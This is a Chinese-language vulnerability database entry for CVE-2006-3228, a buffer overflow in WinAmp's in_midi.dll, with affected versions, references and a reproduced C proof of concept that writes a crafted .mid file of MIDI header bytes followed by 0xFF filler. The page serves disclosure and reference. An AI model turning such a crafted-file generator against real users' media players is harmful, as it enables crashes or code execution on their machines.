WinAmp in_midi.dll 缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110494 漏洞类型 缓冲区溢出
发布时间 2006-06-20 更新时间 2006-06-26
CVE编号 CVE-2006-3228 CNNVD-ID CNNVD-200606-496
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/1935
https://www.securityfocus.com/bid/83787
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200606-496
|漏洞详情
WinAmp2.90到5.23版本(包括5.21版本)的in_midi.dll存在缓冲区溢出,远程攻击者可以借助特制的.mid(MIDI)文件执行任意代码。
|漏洞EXP
/*
 
 * ********************************************** *
 * Winamp 5.21 - Midi Buffer Overflow in_midi.dll *
 * ********************************************** *
 * PoC coded by: BassReFLeX                       *
 * Date: 19 Jun 2006                              *
 * ********************************************** *
 
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void usage(char* file);

char header[] = "\x4D\x54\x68\x64\x00\x00"
                "\x00\x06\x00\x00\x00\x01"
                "\x00\x60\x4D\x54\x72\x6B"
                "\x00\x00";

char badc0de[] = "\xFF\xFF\xFF\xFF\xFF\xFF"
		 "\xFF\xFF\xFF\xFF\xFF\xFF";
				
				 
				 
int main(int argc,char* argv[])
{
    system("cls");
    printf("\n* ********************************************** *");
    printf("\n* Winamp 5.21 - Midi Buffer Overflow in_midi.dll *");
    printf("\n* ********************************************** *");
    printf("\n* PoC coded by: BassReFLeX                       *");
    printf("\n* Date: 19 Jun 2006                              *");
    printf("\n* ********************************************** *");
    
    if ( argc!=2 )
    {
        usage(argv[0]);
    }
    
    FILE *f;
    f = fopen(argv[1],"w");
    if ( !f )
    {
        printf("\nFile couldn't open!");
        exit(1);
    }
    
                        
    printf("\n\nWriting crafted .mid file...");
    fwrite(header,1,sizeof(header),f);
    fwrite(badc0de,1,sizeof(badc0de),f);
    printf("\nFile created successfully!");
    printf("\nFile: %s",argv[1]);
    return 0;
}        

void usage(char* file)
{
    printf("\n\n");
    printf("\n%s <Filename>",file);
    printf("\n\nFilename = .mid crafted file. Example: winsploit.exe craftedsh1t.mid");
    exit(1);
}    

// milw0rm.com [2006-06-20]
|受影响的产品
NullSoft Winamp 2.91 NullSoft Winamp 5.23 NullSoft Winamp 5.21 NullSoft Winamp 5.2 NullSoft Winamp 5.13 NullSoft Winamp 5.12 NullSoft Winamp 5.11
|参考资料

来源:forums.winamp.com
链接:http://forums.winamp.com/showthread.php?threadid=248100
来源:www.winamp.com
链接:http://www.winamp.com/about/article.php?aid=10694
来源:MILW0RM
名称:1935
链接:http://www.milw0rm.com/exploits/1935
来源:VIM
名称:20060622Winampsecurityvagueness
链接:http://www.attrition.org/pipermail/vim/2006-June/000893.html
来源:VIM
名称:20060622Winampsecurityvagueness
链接:http://www.attrition.org/pipermail/vim/2006-June/000892.html
来源:SECUNIA
名称:20722
链接:http://secunia.com/advisories/20722
来源:MILW0RM
名称:1935
链接:http://milw0rm.com/exploits/1935